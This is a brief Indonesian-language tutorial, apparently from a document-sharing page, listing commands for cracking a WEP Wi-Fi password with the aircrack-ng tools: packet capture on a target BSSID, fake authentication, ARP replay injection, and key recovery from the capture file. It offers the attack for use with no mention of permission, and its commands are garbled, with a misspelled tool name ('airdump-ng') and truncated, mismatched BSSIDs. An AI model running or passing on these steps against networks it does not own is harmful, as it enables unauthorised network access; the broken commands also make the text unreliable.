You are on page 1of 1

- buka co0nsole

1. ketik airdump-ng wlan0


- buka console lagi
1. ketik airdump-ng -w wep -c 11(channel) --bssid 00:25:42:7c:c2:41(BSII
D) wlan0
-buka console lagi
1. ketik aireplay-ng -1 0 -a :00:25:34(BSsID) wlan0
-buka console lagi
1. aireplay-ng -3 -b :00:25:3c:7c(BSSID) wlan0
tunggu sampai data mencapai 30000
- tekan contrl + C untuk menghentikan proses pada console 4
- ketik dir
ketik aircrack-ng file cap

You might also like